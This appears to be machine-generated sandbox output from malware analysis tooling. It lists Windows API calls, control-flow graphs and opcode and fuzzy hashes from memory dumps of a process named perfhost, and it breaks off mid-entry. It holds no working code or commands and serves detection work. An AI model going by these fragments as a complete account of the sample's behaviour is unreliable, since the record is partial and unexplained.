                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InformationToken
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4114910276-0
                                                                                                                                                          • Opcode ID: 756da40ae603b4d11ad2750fbd91a1689ef9e37cbdf043ddbe2ef921e66c2746
                                                                                                                                                          • Instruction ID: 8db4199483d3137f4213e9f598f0acc8957329df0653f20a64ce4cbf3fe04b1b
                                                                                                                                                          • Opcode Fuzzy Hash: 756da40ae603b4d11ad2750fbd91a1689ef9e37cbdf043ddbe2ef921e66c2746
                                                                                                                                                          • Instruction Fuzzy Hash: 37E01238249B45FFDA2216504C01A366F28FB85B43F49048BBC59F51B6CD554C1D5A69
                                                                                                                                                          APIs
                                                                                                                                                          • GetSidSubAuthorityCount.ADVAPI32 ref: 00858199
                                                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?,?,?,00855563), ref: 008581EB
                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,00855563), ref: 0085826F
                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,?,?,?,?,00855563), ref: 00858280
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00855563), ref: 0085828E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AuthorityCloseCountCurrentErrorHandleInformationLastProcessToken
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 85819701-0
                                                                                                                                                          • Opcode ID: edc5bf46553fc7619a0dba04de44fabc875fa52cb93f734d6dc0bd939071a9ee
                                                                                                                                                          • Instruction ID: 232acc7568fa622e8afd260cc40e49de86a05186ffcc1614c020a3651ef645e4
                                                                                                                                                          • Opcode Fuzzy Hash: edc5bf46553fc7619a0dba04de44fabc875fa52cb93f734d6dc0bd939071a9ee
                                                                                                                                                          • Instruction Fuzzy Hash: 7BE01225E8DA04CAD926162C1C195753E24F412327F0C1697DC52F7271ED254C1E9762
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?,?,?,00855563), ref: 008581EB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: 9b6c70f1d0b00a25384dc593911b87b47da71944573cf460963a0b3a30fed4fc
                                                                                                                                                          • Instruction ID: 510815a4786c35e73b8877e62df801092899e5719a43182ade4097a4203f489d
                                                                                                                                                          • Opcode Fuzzy Hash: 9b6c70f1d0b00a25384dc593911b87b47da71944573cf460963a0b3a30fed4fc
                                                                                                                                                          • Instruction Fuzzy Hash: A5D02B3574DE00C34D31151C4C089377D00F940B23F480357DCA1F2290ED60CC1F8A62

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 11981 855917-855918 11982 8558fc-855908 CloseHandle 11981->11982 11983 85591a-8559a7 11981->11983 11983->11982 11985 8559ad-855a00 call 8940ba 11983->11985
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: e9b6ac61ac32b92b7191d8efcd68d19451dff804b92b5400fb1a2d7257489fb9
                                                                                                                                                          • Instruction ID: 42f59da3cfbf2ce01e527870e8f3e176c5d26debb4cd7990d5f162538e260b09
                                                                                                                                                          • Opcode Fuzzy Hash: e9b6ac61ac32b92b7191d8efcd68d19451dff804b92b5400fb1a2d7257489fb9
                                                                                                                                                          • Instruction Fuzzy Hash: 09D097D091CA00E6DE008A685C76E3B3949FA28303308057A7C42C6112E428CC0CEFE3

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 11989 855bc0-855bc7 11990 855bcd-855bd9 VirtualAlloc 11989->11990 11991 855bc9 11989->11991 11991->11990 11992 855bcb 11991->11992 11992->11990
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00854F02,00000060), ref: 00855BD3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                          • Opcode ID: e12d6c2f4d3cb41033dd57c7c66d5412c757dc0937659ebf73decfbd0e507a21
                                                                                                                                                          • Instruction ID: 3d1c06bf83d9936cf41ac259f0783d95aa4c7dd90a0a53b53b4b2e5114741016
                                                                                                                                                          • Opcode Fuzzy Hash: e12d6c2f4d3cb41033dd57c7c66d5412c757dc0937659ebf73decfbd0e507a21
                                                                                                                                                          • Instruction Fuzzy Hash: 56C09238A857466EFD3A57584DBFF643FA4F740B36F084946F74AD90F092B00494D60A
                                                                                                                                                          APIs
                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 008909E9
                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 008909F3
                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 00890A00
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                          • Opcode ID: bd891074012280b3203eaed811e475a69e4836c30639365004f9bca71998f3d2
                                                                                                                                                          • Instruction ID: 7dc026ba6f60ad614d6ec6d8ecdfb02e0fab9123b41c54b0ef9557380d0dcd1f
                                                                                                                                                          • Opcode Fuzzy Hash: bd891074012280b3203eaed811e475a69e4836c30639365004f9bca71998f3d2
                                                                                                                                                          • Instruction Fuzzy Hash: 9831B27590132C9BCF61EF68D889B8DBBB8FF08310F5441EAE81CA6251E7709B858F45
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000003,?,008934A3,00000003,008ACE80,0000000C,008935CD,00000003,00000002,00000000,?,008915C8,00000003), ref: 008934EE
                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,008934A3,00000003,008ACE80,0000000C,008935CD,00000003,00000002,00000000,?,008915C8,00000003), ref: 008934F5
                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00893507
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                          • Opcode ID: 46133e911251d5ec340eb83a1526a249d8d1c1443476f70007c57a46ff3a5a54
                                                                                                                                                          • Instruction ID: 93fa51c08d6b9f04413c976bbf1c48f99adac5442963a5c79d603b2936499efb
                                                                                                                                                          • Opcode Fuzzy Hash: 46133e911251d5ec340eb83a1526a249d8d1c1443476f70007c57a46ff3a5a54
                                                                                                                                                          • Instruction Fuzzy Hash: 3BE04631000509ABCF02BF2CCC0DA583F69FB05381B0D4428F8868A131CB39EE42CB80
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                          • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                          • Instruction Fuzzy Hash:

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 12041 891a8f-891aa3 12042 891b11-891b19 12041->12042 12043 891aa5-891aaa 12041->12043 12044 891b1b-891b1e 12042->12044 12045 891b60-891b78 call 891c02 12042->12045 12043->12042 12046 891aac-891ab1 12043->12046 12044->12045 12047 891b20-891b5d call 891626 * 4 12044->12047 12053 891b7b-891b82 12045->12053 12046->12042 12049 891ab3-891ab6 12046->12049 12047->12045 12049->12042 12051 891ab8-891ac0 12049->12051 12054 891ada-891ae2 12051->12054 12055 891ac2-891ac5 12051->12055 12057 891ba1-891ba5 12053->12057 12058 891b84-891b88 12053->12058 12060 891afc-891b10 call 891626 * 2 12054->12060 12061 891ae4-891ae7 12054->12061 12055->12054 12059 891ac7-891ad9 call 891626 call 892603 12055->12059 12068 891bbd-891bc9 12057->12068 12069 891ba7-891bac 12057->12069 12063 891b8a-891b8d 12058->12063 12064 891b9e 12058->12064 12059->12054 12060->12042 12061->12060 12066 891ae9-891afb call 891626 call 892701 12061->12066 12063->12064 12073 891b8f-891b9d call 891626 * 2 12063->12073 12064->12057 12066->12060 12068->12053 12072 891bcb-891bd8 call 891626 12068->12072 12077 891bba 12069->12077 12078 891bae-891bb1 12069->12078 12073->12064 12077->12068 12078->12077 12085 891bb3-891bb9 call 891626 12078->12085 12085->12077
                                                                                                                                                          APIs
                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 00891AD3
                                                                                                                                                            • Part of subcall function 00892603: _free.LIBCMT ref: 00892620
                                                                                                                                                            • Part of subcall function 00892603: _free.LIBCMT ref: 00892632
                                                                                                                                                            • Part of subcall function 00892603: _free.LIBCMT ref: 00892644
                                                                                                                                                            • Part of subcall function 00892603: _free.LIBCMT ref: 00892656
                                                                                                                                                            • Part of subcall function 00892603: _free.LIBCMT ref: 00892668
                                                                                                                                                            • Part of subcall function 00892603: _free.LIBCMT ref: 0089267A
                                                                                                                                                            • Part of subcall function 00892603: _free.LIBCMT ref: 0089268C
                                                                                                                                                            • Part of subcall function 00892603: _free.LIBCMT ref: 0089269E
                                                                                                                                                            • Part of subcall function 00892603: _free.LIBCMT ref: 008926B0
                                                                                                                                                            • Part of subcall function 00892603: _free.LIBCMT ref: 008926C2
                                                                                                                                                            • Part of subcall function 00892603: _free.LIBCMT ref: 008926D4
                                                                                                                                                            • Part of subcall function 00892603: _free.LIBCMT ref: 008926E6
                                                                                                                                                            • Part of subcall function 00892603: _free.LIBCMT ref: 008926F8
                                                                                                                                                          • _free.LIBCMT ref: 00891AC8
                                                                                                                                                            • Part of subcall function 00891626: HeapFree.KERNEL32(00000000,00000000,?,00892798,?,00000000,?,00000000,?,008927BF,?,00000007,?,?,00891C27,?), ref: 0089163C
                                                                                                                                                            • Part of subcall function 00891626: GetLastError.KERNEL32(?,?,00892798,?,00000000,?,00000000,?,008927BF,?,00000007,?,?,00891C27,?,?), ref: 0089164E
                                                                                                                                                          • _free.LIBCMT ref: 00891AEA
                                                                                                                                                          • _free.LIBCMT ref: 00891AFF
                                                                                                                                                          • _free.LIBCMT ref: 00891B0A
                                                                                                                                                          • _free.LIBCMT ref: 00891B2C
                                                                                                                                                          • _free.LIBCMT ref: 00891B3F
                                                                                                                                                          • _free.LIBCMT ref: 00891B4D
                                                                                                                                                          • _free.LIBCMT ref: 00891B58
                                                                                                                                                          • _free.LIBCMT ref: 00891B90
                                                                                                                                                          • _free.LIBCMT ref: 00891B97
                                                                                                                                                          • _free.LIBCMT ref: 00891BB4
                                                                                                                                                          • _free.LIBCMT ref: 00891BCC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                          • Opcode ID: 3db48cd7af6b8aed872d40b00d43975966886b9f9aaec959312ace21572999e8
                                                                                                                                                          • Instruction ID: 04354d80c5e5da83660c7a0dc1c725f568dd2372420fc44391bdf659e23fe7ec
                                                                                                                                                          • Opcode Fuzzy Hash: 3db48cd7af6b8aed872d40b00d43975966886b9f9aaec959312ace21572999e8
                                                                                                                                                          • Instruction Fuzzy Hash: B4317E31A086069FEF31BA39D849B56B7EAFF10360F5C4819E859D7291EF70AC40C755

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 12098 890fab-890fc6 12099 890fd8 12098->12099 12100 890fc8-890fd6 RtlDecodePointer 12098->12100 12101 890fdd-890fe3 12099->12101 12100->12101 12102 890fe9 12101->12102 12103 89110a-89110d 12101->12103 12104 890fef-890ff2 12102->12104 12105 8910fe 12102->12105 12106 89116a 12103->12106 12107 89110f-891112 12103->12107 12109 890ff8 12104->12109 12110 89109f-8910a2 12104->12110 12108 891100-891105 12105->12108 12111 891171 12106->12111 12112 89115e 12107->12112 12113 891114-891117 12107->12113 12114 8911b3-8911c2 call 89419d 12108->12114 12115 89108c-89109a 12109->12115 12116 890ffe-891003 12109->12116 12120 8910f5-8910fc 12110->12120 12121 8910a4-8910a7 12110->12121 12117 891178-8911a1 12111->12117 12112->12106 12118 891119-89111c 12113->12118 12119 891152 12113->12119 12115->12117 12124 89107d-891087 12116->12124 12125 891005-891008 12116->12125 12147 8911ae-8911b1 12117->12147 12148 8911a3-8911a8 call 890b63 12117->12148 12126 89111e-891121 12118->12126 12127 891146 12118->12127 12119->12112 12123 8910b9-8910e7 12120->12123 12128 8910a9-8910ac 12121->12128 12129 8910ec-8910f3 12121->12129 12123->12147 12124->12117 12131 89100a-89100d 12125->12131 12132 891074-89107b 12125->12132 12134 89113a 12126->12134 12135 891123-891128 12126->12135 12127->12119 12128->12114 12136 8910b2 12128->12136 12129->12111 12139 89100f-891012 12131->12139 12140 891065-89106f 12131->12140 12138 89101f-89104f 12132->12138 12134->12127 12141 89112a-89112d 12135->12141 12142 891133-891138 12135->12142 12136->12123 12138->12147 12152 891055-891060 call 890b63 12138->12152 12139->12114 12143 891018 12139->12143 12140->12117 12141->12114 12141->12142 12142->12108 12143->12138 12147->12114 12148->12147 12152->12147
                                                                                                                                                          APIs
                                                                                                                                                          • RtlDecodePointer.NTDLL(00000000), ref: 00890FCE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DecodePointer
                                                                                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                          • API String ID: 3527080286-3064271455
                                                                                                                                                          • Opcode ID: b9404097ef19eaa08214c94e9f5d2741d956a5332f102d96907fbf6ce66de236
                                                                                                                                                          • Instruction ID: 272cc9bcbd986531a1abc0c430317da253259947143a656660f7027da3fe83a5
                                                                                                                                                          • Opcode Fuzzy Hash: b9404097ef19eaa08214c94e9f5d2741d956a5332f102d96907fbf6ce66de236
                                                                                                                                                          • Instruction Fuzzy Hash: D9517070A0850FEBDF10BF98DA4C1ACBBB4FF4A304F280195D681E7664CB769968DB15

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 12155 89712c-897189 GetConsoleCP 12156 8972cc-8972de call 89419d 12155->12156 12157 89718f-8971ab 12155->12157 12158 8971ad-8971c4 12157->12158 12159 8971c6-8971d7 call 8925dd 12157->12159 12161 897200-89720f call 896ec7 12158->12161 12166 8971d9-8971dc 12159->12166 12167 8971fd-8971ff 12159->12167 12161->12156 12171 897215-897235 WideCharToMultiByte 12161->12171 12169 8972a3-8972c2 12166->12169 12170 8971e2-8971f4 call 896ec7 12166->12170 12167->12161 12169->12156 12170->12156 12178 8971fa-8971fb 12170->12178 12171->12156 12172 89723b-897251 WriteFile 12171->12172 12174 897253-897264 12172->12174 12175 8972c4-8972ca GetLastError 12172->12175 12174->12156 12177 897266-89726a 12174->12177 12175->12156 12179 897298-89729b 12177->12179 12180 89726c-89728a WriteFile 12177->12180 12178->12171 12179->12157 12182 8972a1 12179->12182 12180->12175 12181 89728c-897290 12180->12181 12181->12156 12183 897292-897295 12181->12183 12182->12156 12183->12179
                                                                                                                                                          APIs
                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,008978A1,?,00000000,?,00000000,00000000), ref: 0089716E
                                                                                                                                                          • __fassign.LIBCMT ref: 008971E9
                                                                                                                                                          • __fassign.LIBCMT ref: 00897204
                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0089722A
                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,008978A1,00000000,?,?,?,?,?,?,?,?,?,008978A1,?), ref: 00897249
                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,008978A1,00000000,?,?,?,?,?,?,?,?,?,008978A1,?), ref: 00897282
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                          • Opcode ID: 1f9fbce790d8b1367482012ce80ef5ce2594a9c668844aa95c09ff3ef52d4106
                                                                                                                                                          • Instruction ID: 66d064f62cc01145e914102720dac4806d38b84147f88b52535d79e7bad38c0d
                                                                                                                                                          • Opcode Fuzzy Hash: 1f9fbce790d8b1367482012ce80ef5ce2594a9c668844aa95c09ff3ef52d4106
                                                                                                                                                          • Instruction Fuzzy Hash: 31519D71A142099FDF10DFA8DC85AEEBBB8FF19300F18415AE956E7291E6309940CB61

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 12184 8927a6-8927b1 12185 892887-892889 12184->12185 12186 8927b7-892884 call 89276a * 5 call 891626 * 3 call 89276a * 5 call 891626 * 4 12184->12186 12186->12185
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0089276A: _free.LIBCMT ref: 00892793
                                                                                                                                                          • _free.LIBCMT ref: 008927F4
                                                                                                                                                            • Part of subcall function 00891626: HeapFree.KERNEL32(00000000,00000000,?,00892798,?,00000000,?,00000000,?,008927BF,?,00000007,?,?,00891C27,?), ref: 0089163C
                                                                                                                                                            • Part of subcall function 00891626: GetLastError.KERNEL32(?,?,00892798,?,00000000,?,00000000,?,008927BF,?,00000007,?,?,00891C27,?,?), ref: 0089164E
                                                                                                                                                          • _free.LIBCMT ref: 008927FF
                                                                                                                                                          • _free.LIBCMT ref: 0089280A
                                                                                                                                                          • _free.LIBCMT ref: 0089285E
                                                                                                                                                          • _free.LIBCMT ref: 00892869
                                                                                                                                                          • _free.LIBCMT ref: 00892874
                                                                                                                                                          • _free.LIBCMT ref: 0089287F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                          • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                          • Instruction ID: ea80b2b8cd49e85ea19acaf03ce53ea2a278b1ce8b9faa7a6bebf899d509df66
                                                                                                                                                          • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                          • Instruction Fuzzy Hash: DA112C72940B05BADE31BBB4CD4AFCB7B9CFF04700F880C15BA99F6052DA65A9044753

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 12221 893a79-893a92 12222 893aa8-893aad 12221->12222 12223 893a94-893aa4 call 893f8c 12221->12223 12225 893aba-893ade MultiByteToWideChar 12222->12225 12226 893aaf-893ab7 12222->12226 12223->12222 12233 893aa6 12223->12233 12227 893c71-893c84 call 89419d 12225->12227 12228 893ae4-893af0 12225->12228 12226->12225 12230 893af2-893b03 12228->12230 12231 893b44 12228->12231 12234 893b22-893b33 call 89288a 12230->12234 12235 893b05-893b14 call 894330 12230->12235 12237 893b46-893b48 12231->12237 12233->12222 12241 893c66 12234->12241 12249 893b39 12234->12249 12235->12241 12248 893b1a-893b20 12235->12248 12240 893b4e-893b61 MultiByteToWideChar 12237->12240 12237->12241 12240->12241 12245 893b67-893b82 call 8918a7 12240->12245 12242 893c68-893c6f call 892bac 12241->12242 12242->12227 12245->12241 12253 893b88-893b8f 12245->12253 12252 893b3f-893b42 12248->12252 12249->12252 12252->12237 12254 893bc9-893bd5 12253->12254 12255 893b91-893b96 12253->12255 12257 893c21 12254->12257 12258 893bd7-893be8 12254->12258 12255->12242 12256 893b9c-893b9e 12255->12256 12256->12241 12259 893ba4-893bbe call 8918a7 12256->12259 12260 893c23-893c25 12257->12260 12261 893bea-893bf9 call 894330 12258->12261 12262 893c03-893c14 call 89288a 12258->12262 12259->12242 12274 893bc4 12259->12274 12265 893c5f-893c65 call 892bac 12260->12265 12266 893c27-893c40 call 8918a7 12260->12266 12261->12265 12277 893bfb-893c01 12261->12277 12262->12265 12273 893c16 12262->12273 12265->12241 12266->12265 12279 893c42-893c49 12266->12279 12278 893c1c-893c1f 12273->12278 12274->12241 12277->12278 12278->12260 12280 893c4b-893c4c 12279->12280 12281 893c85-893c8b 12279->12281 12282 893c4d-893c5d WideCharToMultiByte 12280->12282 12281->12282 12282->12265 12283 893c8d-893c94 call 892bac 12282->12283 12283->12242
                                                                                                                                                          APIs
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00893CCA,?,?,00000000), ref: 00893AD3
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00893CCA,?,?,00000000,?,?,?), ref: 00893B59
                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00893C53
                                                                                                                                                          • __freea.LIBCMT ref: 00893C60
                                                                                                                                                            • Part of subcall function 0089288A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 008928BC
                                                                                                                                                          • __freea.LIBCMT ref: 00893C69
                                                                                                                                                          • __freea.LIBCMT ref: 00893C8E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                                          • Opcode ID: 6a4defb0a4ee1e2e8cc9dda5342d181e2559ff936b194afca3dfdbc50f123c95
                                                                                                                                                          • Instruction ID: 5ed5aa7d269adbef8800644707817905e4d30179e6dae022ab73901969d19323
                                                                                                                                                          • Opcode Fuzzy Hash: 6a4defb0a4ee1e2e8cc9dda5342d181e2559ff936b194afca3dfdbc50f123c95
                                                                                                                                                          • Instruction Fuzzy Hash: 1F51E372A00616AFDF25AF68CC85EAF77AAFB40768F1C4629FC05E6140EB34DE50D650

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 12286 890deb-890dff GetLastError 12287 890e0d-890e1f call 8915c9 12286->12287 12288 890e01-890e0b call 891796 12286->12288 12294 890e2a-890e38 call 8917ec 12287->12294 12295 890e21 12287->12295 12288->12287 12293 890e56-890e61 SetLastError 12288->12293 12301 890e3a-890e3b 12294->12301 12302 890e3d-890e54 call 890d27 call 891626 12294->12302 12296 890e22-890e28 call 891626 12295->12296 12303 890e62-890e6e SetLastError call 891586 12296->12303 12301->12296 12302->12293 12302->12303
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                          • Opcode ID: 3fabf382155981fc60095e2e28e2f4da626542a04072d5aeaff1304e1b39fd98
                                                                                                                                                          • Instruction ID: 0a268e8b00ceb1c688a6edcd351285ea6350603f481ec9ecfa1b45e146f320c3
                                                                                                                                                          • Opcode Fuzzy Hash: 3fabf382155981fc60095e2e28e2f4da626542a04072d5aeaff1304e1b39fd98
                                                                                                                                                          • Instruction Fuzzy Hash: 01F0F4365089027EDE12336C6C0EB2F2669FBC2761F6E0D29F925D2292FE608C014662

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 12310 893552-89357a GetModuleHandleExW 12311 89357c-89358f GetProcAddress 12310->12311 12312 89359f-8935a3 12310->12312 12313 89359e 12311->12313 12314 893591-89359c 12311->12314 12315 8935ae-8935bb call 89419d 12312->12315 12316 8935a5-8935a8 FreeLibrary 12312->12316 12313->12312 12314->12313 12316->12315
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00893503,00000003,?,008934A3,00000003,008ACE80,0000000C,008935CD,00000003,00000002), ref: 00893572
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00893585
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00893503,00000003,?,008934A3,00000003,008ACE80,0000000C,008935CD,00000003,00000002,00000000), ref: 008935A8
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                          • Opcode ID: 9bf047d54ad572b4c3db2cea684d8db00f556ab519af365acacac7f43c25b971
